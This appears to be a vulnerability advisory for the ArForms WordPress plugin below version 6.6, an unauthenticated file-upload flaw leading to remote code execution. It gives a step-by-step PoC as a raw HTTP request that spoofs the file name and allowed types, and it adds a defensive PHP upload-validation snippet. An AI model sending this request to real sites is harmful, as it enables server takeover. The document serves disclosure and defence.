wpvulndb | mgthuramoemyint | WPVDB-ID: DC34DC2D-D5A1-4E28-8507-33F659EAD647
Published: May 17, 2024 - 12:00 a.m.

ArForms < 6.6 - Unauthenticated RCE

wpscan.com
Tags: arforms, unauthenticated rce, file modification, php code upload

AI Score: 9.5 High (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description

The plugin allows unauthenticated users to modify uploaded files in such a way that PHP code can be uploaded when an upload file input is included on a form.

PoC

1. Create a form with an upload input.
2. As an unauthenticated user, upload an image file and intercept the request.
3. Modify it like the following:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: testbox
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X_FILENAME: 3readme.php
X-FILENAME: 3readme.php
Content-Type: multipart/form-data; boundary=---------------------------231372247329806589063676810774
Content-Length: 1110
Origin: http://testbox
Connection: close
Referer: http://testbox/wordpress/index.php/2024/04/08/hello-world/
Cookie: wordpress_ba62313c33aedb7d46cae591be063de4=mirphak%7C17151795;wpforms_fields_group_settings_advanced=true; 45df-a0b7-fdcb263f17ee57190a; PHPSESSID=m0tplmmem0pm28kseu7iola5d7

-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="action"

arf_send_form_data
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="frm"

100
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="field_id"

gfeav2_58393
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="file_type"

text/html
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="types_arr"

htm|html, jpg|jpeg|php
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="is_preview"

-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="files"; filename="readme.html"
Content-Type: text/html

-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="token"

72JcFplqUK
-----------------------------231372247329806589063676810774--

4. Access the file (in the example above it is 3readme.php) and see the PHP execute.
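A hardened upload-name policy, added here as an example and not ArForms' own code: it assumes a hypothetical form handler (`store_form_upload`, `safe_upload_name`) and decides the stored extension from a server-side allowlist plus a finfo sniff of the temp file, so the request-supplied `types_arr`, `file_type` and `X_FILENAME` values the PoC manipulates have no say in the stored name.

```php
<?php
// Server-side allowlist: the only extensions a form upload may be stored with.
// The request's own "types_arr"/"file_type" fields (seen in the PoC) and any
// client-supplied target name (X_FILENAME header) are deliberately ignored.
const ALLOWED_UPLOAD_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];

// Expected MIME per extension, compared against a server-side sniff of the
// temp file rather than the client's declared Content-Type.
const EXT_TO_MIME = [
    'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png',
    'gif' => 'image/gif',  'pdf' => 'application/pdf',
];

// Returns a server-chosen storage name for an upload, or null to reject it.
// $client_name is the multipart "filename" value; $sniffed_mime is from finfo.
function safe_upload_name(string $client_name, string $sniffed_mime): ?string
{
    $base = strtolower(basename(str_replace('\\', '/', $client_name)));
    // Exactly one dot: rejects "shell.php.jpg" double extensions and dotfiles.
    if (substr_count($base, '.') !== 1) {
        return null;
    }
    [$stem, $ext] = explode('.', $base, 2);
    if ($stem === '' || !in_array($ext, ALLOWED_UPLOAD_EXT, true)
        || (EXT_TO_MIME[$ext] ?? null) !== $sniffed_mime) {
        return null;
    }
    // Keep only a sanitised hint of the original stem; the random suffix makes
    // the stored path unguessable and prevents clobbering existing files.
    $hint = substr(preg_replace('/[^a-z0-9_-]/', '', $stem), 0, 40);
    return ($hint !== '' ? $hint : 'upload') . '-' . bin2hex(random_bytes(8)) . '.' . $ext;
}

// Glue for one $_FILES entry (hypothetical handler, not plugin code). The
// upload directory should additionally have script execution disabled.
function store_form_upload(array $file, string $upload_dir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']) ?: '';
    $name = safe_upload_name($file['name'], $mime);
    if ($name === null) {
        return null;   // e.g. "3readme.php" or an HTML/PHP body posing as an image
    }
    $dest = rtrim($upload_dir, '/') . '/' . $name;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}
```

With this policy the PoC's `readme.html` upload is rejected twice over: `html` is not in the allowlist, and the sniffed MIME would not match an image extension even if the name were changed.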

CPE
Name | Operator | Version
     | eq       | 6.6

